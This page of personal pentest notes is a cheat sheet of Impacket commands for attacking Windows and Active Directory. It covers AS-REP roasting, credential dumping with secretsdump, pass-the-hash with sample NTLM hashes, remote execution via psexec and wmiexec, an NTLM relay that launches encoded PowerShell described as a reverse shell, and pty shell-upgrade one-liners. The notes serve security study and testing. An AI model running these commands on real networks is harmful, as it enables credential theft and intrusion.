akde/infosec

Information security is ultimately about managing risk

Impacket

,
,

See the Impack­et site for a short descrip­tion of all tools.

Tip: On Kali, use the com­mand impacket-*

Enumeration without authentication

Deter­mine the sys­tem architecture

getArch.py -target $target

Returns the lis­ten­ing RPC inter­face IDs.

ifmap.py $target 135
rpcdump.py $target

Enumeration with half authentication

Sce­nario: You have cre­den­tials for one AD user. Then, try to get all users for which Ker­beros preau­then­ti­ca­tion is dis­abled. From Kali, use this com­mand with the one valid cre­den­tials you have from peter:

impacket-GetNPUsers -dc-ip $ip  -request dom.ain/peter

If you get hash: Hash­cat and mode 18200.

Enumeration with authentication

Find (oth­er) users

lookupsid.py dom/user:pass@$target
samrdump.py dom/user:pass@$target

Get­ting as much cre­den­tials as possible

secretsdump.py dom/user:pass@$target

Get AD users

GetADUsers.py -dc-ip $target dom/user:pass

Deter­mine if a user exists

rdp_check.py dom/user:pass@$target
rdp_check.py -hashes b40c7060e1bf68227131564a1bf33d48:b40c7060e1bf68227131564a1bf33d48 svcorp.com/nicky@$target

List run­ning process­es (see help, more options are pos­si­ble here)

services.py dom/user:pass@$target list

Code exe­cu­tion

atexec.py dom/user:pass@$target systeminfo
psexec.py dom/user:pass@$target systeminfo
impacket-psexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b Administrator@$target

Shell like Win­RM, but with dif­fer­ent end­points; could work even when Win­RM is not activated.

dcomexec.py dom/user:pass@$target dir
smbexec.py dom/user:pass@$target
wmiexec.py dom/user:pass@$target

(See pth-winexe here as well!)

Track­ing ses­sions. This script will remain open and show when ses­sions are cre­at­ed or closed.

netview.py dom/user:pass -target $target

Brows­ing through SMB share

smbclient.py dom/user:pass@$target
smbclient.py -hashes aad3b435b51404eeaad3b435b51404ee:6b0e72ee64ea42ca092bd1a7449fa46e Administrator@10.11.1.223
smbclient '\\$target\share' -U user%$HASH --pw-nt-hash

Read­ing and manip­u­lat­ing the registry

reg.py dom/user:pass@$target query -keyName HKLM\\Software\\

Relaying NTLMv2 authentication

If you con­trol a user and want to use its cre­den­tials to authen­ti­cate against anoth­er system:

  1. Set up a ntlm­re­layx with a code to exe­cute on your own sys­tem:
    impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.50.212 -c "powershell -enc JABjA…"
    The -enc part is base64 encod­ed Pow­er­Shell code; e.g. a reverse shell code.
  2. Start a lis­ten­er (defined in the ‑enc part)
  3. Con­nect from the vic­tim via smb, e.g.
    • In the Win­dows explorer,
    • via the com­mand line dir \\$ownSystem\nonexistingShare or
    • via Pow­er­Shell Get-ChildItem \$ownSystem\nonex­ist­ing­Share

See https://www.secureauth.com/blog/playing-relayed-credentials for ntlmrelayx.py.

Leave a Reply

About

Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.

Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.

Checklists

Categories

Checklists: Ports

python -c 'import pty;pty.spawn("/bin/bash")';

python3 -c 'import pty;pty.spawn("/bin/bash")';